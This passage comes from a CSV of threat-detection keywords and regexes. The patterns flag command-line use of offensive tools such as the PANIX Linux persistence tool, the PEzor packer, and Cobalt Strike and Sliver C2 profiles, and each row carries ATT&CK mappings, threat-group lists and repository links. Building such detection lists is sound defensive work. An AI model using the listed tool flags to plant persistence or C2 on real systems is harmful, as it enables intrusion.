T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4890" "*.sh --cron --custom --command * --crond --name 
*",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crond\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4891" "*.sh --cron --custom --command * --crontab*",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crontab.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4892" "*.sh --cron --custom --command * --daily --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-daily\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4893" "*.sh -format=bof *.exe*",".{0,1000}\.sh\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4894" "*.sh -format=service-dll *",".{0,1000}\.sh\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4895" "*.sh -format=service-exe *",".{0,1000}\.sh\s\-format\=service\-exe\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4896" "*.sh --passwd-user --custom --passwd-string *",".{0,1000}\.sh\s\-\-passwd\-user\s\-\-custom\s\-\-passwd\-string\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4897" "*.sh --shell-profile --custom --command * --path */.bash_profile*",".{0,1000}\.sh\s\-\-shell\-profile\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/\.bash_profile.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4898" "*.sh --systemd --custom --command *",".{0,1000}\.sh\s\-\-systemd\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4899" "*.sh --systemd --default --ip * --port *",".{0,1000}\.sh\s\-\-systemd\s\-\-default\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4900" "*.sh --udev --custom --command *",".{0,1000}\.sh\s\-\-udev\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4901" "*.sh --xdg --custom --command * --path */etc/xdg/autostart/*",".{0,1000}\.sh\s\-\-xdg\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/etc\/xdg\/autostart\/.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable 
Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4902" "*.sh -xorkey=*",".{0,1000}\.sh\s\-xorkey\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4903" "*.sharpgen *",".{0,1000}\.sharpgen\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","0","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","4905" "*.ShellcodeRDI*",".{0,1000}\.ShellcodeRDI.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","4906" "*.sites.123456.*",".{0,1000}\.sites\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4907" "*.SliverRPC/*",".{0,1000}\.SliverRPC\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","4908" "*.smtp.123456.*",".{0,1000}\.smtp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4909" "*.ssl.123456.*",".{0,1000}\.ssl\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 
Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4911" "*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","4912" "*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","4913" "*.static.123456.*",".{0,1000}\.static\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4914" "*.status.123456.*",".{0,1000}\.status\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4916" 
"*.store.123456.*",".{0,1000}\.store\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4917" "*.striker.local*",".{0,1000}\.striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - 
T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","4918" "*.support.123456.*",".{0,1000}\.support\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4919" "*.tor2web *",".{0,1000}\.tor2web\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","4921" "*.torproject.org/*/download/tor/*",".{0,1000}\.torproject\.org\/.{0,1000}\/download\/tor\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4922" 